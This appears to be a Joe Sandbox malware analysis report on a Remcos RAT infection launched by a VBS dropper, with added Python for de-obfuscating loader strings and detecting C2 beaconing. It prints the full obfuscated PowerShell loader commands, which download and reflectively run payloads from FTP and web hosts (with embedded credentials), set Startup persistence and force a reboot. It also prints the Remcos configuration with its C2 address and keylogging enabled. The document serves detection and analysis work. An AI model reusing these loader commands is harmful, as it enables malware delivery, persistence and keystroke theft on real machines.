                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' 
+ [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6764, TargetFilename: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
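The loader command lines logged above stack several cheap string tricks: the payload URL is passed reversed and turned around inside the loaded .NET assembly, the FTP user name is assembled at run time with -join [char[]](...), every 'A' in the downloaded base64 blob has been swapped for '?:?' so it fails to decode until Replace() runs, and the second-stage script literal assigned to $qKKzc is spliced with [char]65 so that no clean base64 run ever appears in the command line. The Python below is an added example, not part of the Joe Sandbox report, that undoes each of those transforms. The sample inputs are copied from the report's own command lines (the [char]65 expression is the prefix of the $qKKzc assignment up to the report's truncation, cut at a whole base64 group); the '?:?' sample is constructed, and the reading of the $qKKzc string as base64 of UTF-16LE text holding a reversed script is the example author's assumption, checked by the fact that the decode reproduces the tail of the loader's Invoke line.

```python
"""De-obfuscation helpers for the PowerShell loader strings in the report.

Added example, not part of the Joe Sandbox report. Sample inputs are copied
from the logged command lines except where marked as constructed.
"""
import base64
import re

# Copied from the report: the payload URL is passed backwards to prFVI().
REVERSED_URL = "txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth"

# Copied from the report: FTP user name built from code points.
CHAR_ARRAY_EXPR = "-join [char[]](100,101,115,99,107,118,98,114,97,116,49)"

# Copied from the report: prefix of the $qKKzc assignment, every 'A' of the
# base64 text replaced by [char]65. Cut at a whole 4-char base64 group.
CONCAT_EXPR = (
    "'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 "
    "+ 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 "
    "+ 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 "
    "+ 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65"
)


def reverse_string(s: str) -> str:
    """Undo the reversed-string trick (what prFVI does to its first argument)."""
    return s[::-1]


def join_char_array(expr: str) -> str:
    """Evaluate a PowerShell `-join [char[]](n,n,...)` expression."""
    m = re.search(r"\[char\[\]\]\(([\d,\s]+)\)", expr)
    if not m:
        raise ValueError("no [char[]](...) literal found")
    return "".join(chr(int(n)) for n in m.group(1).split(","))


# One quoted fragment (possibly empty) or one [char]N piece.
_PIECE = re.compile(r"'([^']*)'|\[char\](\d+)")


def rebuild_concat(expr: str) -> str:
    """Concatenate the 'literal' + [char]N + ... pieces of a PowerShell expression.

    Works for any mix of quoted fragments and [char]N pieces, not only [char]65.
    """
    return "".join(chr(int(code)) if code else lit for lit, code in _PIECE.findall(expr))


def decode_utf16_base64(b64: str) -> str:
    """Decode base64 that wraps UTF-16LE text (the encoding -EncodedCommand uses).

    A truncated input is tolerated: the incomplete base64 group and any odd
    trailing byte are dropped instead of raising.
    """
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def restore_base64(s: str, token: str = "?:?") -> bytes:
    """Undo the `$s.Replace('?:?', 'A')` substitution, then decode."""
    return base64.b64decode(s.replace(token, "A"))


if __name__ == "__main__":
    print("payload URL :", reverse_string(REVERSED_URL))
    print("FTP user    :", join_char_array(CHAR_ARRAY_EXPR))
    stage2 = decode_utf16_base64(rebuild_concat(CONCAT_EXPR))
    print("stage-2 tail:", reverse_string(stage2))
    # Constructed sample: base64 of an MZ header with 'A' replaced by '?:?'.
    print("restored    :", restore_base64("TVqQ?:??:?=="))
```

The decoded $qKKzc prefix reads, once reversed, `srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};`, i.e. the end of the same Invoke call that the parent command line passes in the clear, which is why the two process-start entries above fire the same Sigma rules.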

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM

                    Stealing of Sensitive Information

                    Source: Registry Key setAuthor: Joe Security: Data: Details: 86 21 33 9B 08 AF 9C 3A 80 D7 7E 18 79 E0 DB CA 76 7A 40 1E AD 35 7C F9 A4 1C A4 CD 85 A6 DA BF E8 A9 DC 20 86 6A 86 38 07 10 F9 7D C0 FF 09 6B F4 79 61 18 65 8C 2A EE 6D DB 58 32 FB 41 96 25 B0 17 1E D2 4C FD 5F 8D 65 F1 EC CD 0C CB 30 AA 91 6C FA 4B 0E 54 73 17 15 D3 A8 8E 98 2E B6 CB 64 09 9E CA 8E A8 F3 66 72 B1 7D C4 C5 5B DA 97 6D 36 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-52K54M\exepath
Timestamp                        SID      Severity  Classtype                                      Source IP        Src Port  Destination IP   Dst Port  Protocol
2024-10-03T09:28:19.798901+0200  2020423  1         Exploit Kit Activity Detected                  173.231.247.100  443       192.168.2.6      49719     TCP

Timestamp                        SID      Severity  Classtype                                      Source IP        Src Port  Destination IP   Dst Port  Protocol
2024-10-03T09:28:19.798901+0200  2020425  1         Exploit Kit Activity Detected                  173.231.247.100  443       192.168.2.6      49719     TCP

Timestamp                        SID      Severity  Classtype                                      Source IP        Src Port  Destination IP   Dst Port  Protocol
2024-10-03T09:28:24.687917+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49725     212.162.149.163  2404      TCP
2024-10-03T09:28:27.202095+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49726     212.162.149.163  2404      TCP
2024-10-03T09:28:29.719551+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49729     212.162.149.163  2404      TCP
2024-10-03T09:28:32.237386+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49730     212.162.149.163  2404      TCP
2024-10-03T09:28:34.741502+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49731     212.162.149.163  2404      TCP
2024-10-03T09:28:37.263282+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49733     212.162.149.163  2404      TCP
2024-10-03T09:28:39.737467+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49734     212.162.149.163  2404      TCP
2024-10-03T09:28:42.259851+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49735     212.162.149.163  2404      TCP
2024-10-03T09:28:44.783981+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49736     212.162.149.163  2404      TCP
2024-10-03T09:28:47.323437+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49737     212.162.149.163  2404      TCP
2024-10-03T09:28:49.811942+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49739     212.162.149.163  2404      TCP
2024-10-03T09:28:52.327187+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49740     212.162.149.163  2404      TCP
2024-10-03T09:28:54.811710+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49741     212.162.149.163  2404      TCP
2024-10-03T09:28:57.327488+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49743     212.162.149.163  2404      TCP
2024-10-03T09:28:59.820733+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49744     212.162.149.163  2404      TCP
2024-10-03T09:29:02.359457+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49745     212.162.149.163  2404      TCP
2024-10-03T09:29:05.060314+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49746     212.162.149.163  2404      TCP
2024-10-03T09:29:07.515008+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49747     212.162.149.163  2404      TCP
2024-10-03T09:29:10.000254+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49748     212.162.149.163  2404      TCP
2024-10-03T09:29:12.471874+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49749     212.162.149.163  2404      TCP
2024-10-03T09:29:14.936735+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49750     212.162.149.163  2404      TCP
2024-10-03T09:29:17.407502+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49751     212.162.149.163  2404      TCP
2024-10-03T09:29:20.092592+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49753     212.162.149.163  2404      TCP
2024-10-03T09:29:22.827305+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49754     212.162.149.163  2404      TCP
2024-10-03T09:29:25.344002+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49755     212.162.149.163  2404      TCP
2024-10-03T09:29:27.843037+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49756     212.162.149.163  2404      TCP
2024-10-03T09:29:30.326918+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49757     212.162.149.163  2404      TCP
2024-10-03T09:29:32.828638+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49758     212.162.149.163  2404      TCP
2024-10-03T09:29:35.280034+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49759     212.162.149.163  2404      TCP
2024-10-03T09:29:37.799854+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49760     212.162.149.163  2404      TCP
2024-10-03T09:29:40.301582+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49761     212.162.149.163  2404      TCP
2024-10-03T09:29:42.814455+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49762     212.162.149.163  2404      TCP
2024-10-03T09:29:45.358366+0200  2032776  1         Malware Command and Control Activity Detected  192.168.2.6      49763     212.162.149.163  2404      TCP
                    2024-10-03T09:29:47.811790+020020327761Malware Command and Control Activity Detected192.168.2.649764212.162.149.1632404TCP
                    2024-10-03T09:29:50.284883+020020327761Malware Command and Control Activity Detected192.168.2.649765212.162.149.1632404TCP
                    2024-10-03T09:29:52.720677+020020327761Malware Command and Control Activity Detected192.168.2.649766212.162.149.1632404TCP
                    2024-10-03T09:29:55.092566+020020327761Malware Command and Control Activity Detected192.168.2.649767212.162.149.1632404TCP
                    2024-10-03T09:29:57.420650+020020327761Malware Command and Control Activity Detected192.168.2.649769212.162.149.1632404TCP
                    2024-10-03T09:29:59.923538+020020327761Malware Command and Control Activity Detected192.168.2.649770212.162.149.1632404TCP
                    2024-10-03T09:30:02.330484+020020327761Malware Command and Control Activity Detected192.168.2.649771212.162.149.1632404TCP
                    2024-10-03T09:30:04.608519+020020327761Malware Command and Control Activity Detected192.168.2.649772212.162.149.1632404TCP
                    2024-10-03T09:30:06.843533+020020327761Malware Command and Control Activity Detected192.168.2.649773212.162.149.1632404TCP
                    2024-10-03T09:30:09.080687+020020327761Malware Command and Control Activity Detected192.168.2.649774212.162.149.1632404TCP
                    2024-10-03T09:30:09.446203+020020327761Malware Command and Control Activity Detected192.168.2.649774212.162.149.1632404TCP
                    2024-10-03T09:30:12.762607+020020327761Malware Command and Control Activity Detected192.168.2.649775212.162.149.1632404TCP
                    2024-10-03T09:30:15.640291+020020327761Malware Command and Control Activity Detected192.168.2.649776212.162.149.1632404TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-03T09:28:18.472783+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49717 | 188.114.97.3 | 443 | TCP
                    2024-10-03T09:28:22.004816+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49722 | 188.114.97.3 | 443 | TCP

                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-03T09:28:12.500205+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 188.114.97.3 | 443 | TCP
                    2024-10-03T09:28:18.472783+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49717 | 188.114.97.3 | 443 | TCP
                    2024-10-03T09:28:22.004816+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 188.114.97.3 | 443 | TCP
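The SID 2032776 alerts above land roughly 2.5 s apart for the whole run, which is the on-the-wire shape of the short connect interval in the Remcos configuration extracted further down. The following Python is an added example, not part of the Joe Sandbox report: it parses rows transcribed from the tables above (constructed sample, same column order) and scores each flow for periodicity, so the same logic can be run over a Suricata fast.log or EVE export. The thresholds `min_events` and `max_cv` are assumptions chosen for this sample, not values from the report.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample, transcribed from the alert tables above: the first ten Remcos
# check-in alerts (SID 2032776) and the three paste.ee alerts (SID 2841075).
# Column order: timestamp | SID | severity | classtype | src | sport | dst | dport | proto
ALERTS = """\
2024-10-03T09:28:37.263282+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49733 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:39.737467+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49734 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:42.259851+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49735 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:44.783981+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49736 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:47.323437+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49737 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:49.811942+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49739 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:52.327187+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49740 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:54.811710+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49741 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:57.327488+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49743 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:59.820733+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49744 | 212.162.149.163 | 2404 | TCP
2024-10-03T09:28:12.500205+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-03T09:28:18.472783+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49717 | 188.114.97.3 | 443 | TCP
2024-10-03T09:28:22.004816+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 188.114.97.3 | 443 | TCP
"""


def parse_alert(line):
    """Split one pipe-separated alert row into a dict; timestamps keep their UTC offset."""
    ts, sid, sev, cls, src, sport, dst, dport, proto = [f.strip() for f in line.split("|")]
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(sid), "severity": int(sev), "classtype": cls,
        "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto,
    }


def beacon_candidates(alert_text, min_events=5, max_cv=0.15):
    """Group alerts per (src, dst, dport) and score how regular their spacing is.

    A flow is reported as a beacon when it has at least `min_events` alerts and the
    coefficient of variation (stdev / mean) of the gaps between them is at most `max_cv`.
    Flows with fewer events are reported but never flagged, to avoid scoring noise.
    """
    flows = defaultdict(list)
    for line in alert_text.strip().splitlines():
        a = parse_alert(line)
        flows[(a["src"], a["dst"], a["dport"])].append(a["ts"])
    report = {}
    for key, stamps in flows.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(stamps) < min_events:
            report[key] = {"events": len(stamps), "beacon": False, "reason": "too few events"}
            continue
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        report[key] = {
            "events": len(stamps), "mean_interval": mean, "cv": cv,
            "beacon": cv <= max_cv,
            "reason": "regular interval" if cv <= max_cv else "irregular spacing",
        }
    return report


if __name__ == "__main__":
    for (src, dst, dport), r in beacon_candidates(ALERTS).items():
        print(f"{src} -> {dst}:{dport}  events={r['events']}  beacon={r['beacon']}  ({r['reason']})")
```

On this sample the 2404 flow scores a mean gap of about 2.51 s with a coefficient of variation under 1 %, while the three paste.ee requests are too few to score. In production, key the flows on the destination only as well, since Remcos opens a fresh source port for every check-in.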


                    AV Detection

                    Source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "212.162.149.163:2404:0", "Assigned name": "NedDay", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-52K54M", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: desckvbrat.com.br | Virustotal: Detection: 7%
                    Source: ftp.desckvbrat.com.br | Virustotal: Detection: 8%
                    Source: http://ftp.desckvbrat.com.br | Virustotal: Detection: 8%
                    Source: http://desckvbrat.com.br | Virustotal: Detection: 7%
                    Source: https://pastebin.com/raw/pQQ0n3eA | Virustotal: Detection: 5%
                    Source: SKMBT_77122012816310TD0128_17311_XLS.vbs | Virustotal: Detection: 9%
                    Source: Yara match | File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
                    Source: powershell.exe, 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_ea886d74-4

                    Exploits

                    Source: Yara match | File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
